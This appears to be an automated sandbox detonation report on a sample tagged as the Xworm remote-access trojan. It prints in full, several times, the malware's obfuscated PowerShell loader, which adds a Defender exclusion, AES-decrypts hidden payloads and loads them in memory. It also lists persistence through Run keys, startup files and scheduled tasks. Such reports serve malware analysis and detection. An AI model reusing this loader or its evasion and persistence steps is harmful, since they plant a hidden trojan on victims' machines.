"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Network

N/A

Files

memory/2820-0-0x000007FEF5493000-0x000007FEF5494000-memory.dmp

memory/2820-1-0x0000000000CA0000-0x0000000001EE2000-memory.dmp

memory/2820-2-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

memory/2596-3-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

memory/2880-8-0x000000001B6A0000-0x000000001B982000-memory.dmp

memory/2880-9-0x0000000002970000-0x0000000002978000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat

MD5 1a270a2d79f958a83af1ab2b5805e43c
SHA1 aeb2f51a0d1377a25fdcd614fc96fe6b3afbbeeb
SHA256 5a0ee0516cf26c772261c81a9cbc45fa625268576debb7d8b38609687554544c
SHA512 00bec3f89f9f27236adf0167d6382b60a2be56bdb6b00aae0117396e30e77a993b97d2b7f2af3ae96b81bce0b55bf177d4c4d0c272df05d72c2dc55577b14191

memory/2820-20-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

memory/536-27-0x0000000001DC0000-0x0000000001DC8000-memory.dmp

memory/536-26-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EZ3IQV36WKD3F1BFXVG1.temp

MD5 93e39f76d77b580fa62d450532298270
SHA1 354372f4ed848fe8c790e8e6e700a595e002c828
SHA256 b833caf25d47174e317e35221ed2403bff6ac13af2d054ef654dd7ef745b32ae
SHA512 230a04565c3430e12963022e42b04ab725f8882ecf2c9edb6af61b50a985853eb2cc7e97434125003ccc46fa70330d263b7db3ce95e12d61d090fe9a2e2f3a6c

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2596-34-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-05 00:10

Reported

2024-09-05 00:11

Platform

win10v2004-20240802-en

Max time kernel

64s

Max time network

66s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3124 created 5096 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\svchost C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133699686782854814" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133670809812906216" C:\Windows\system32\svchost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
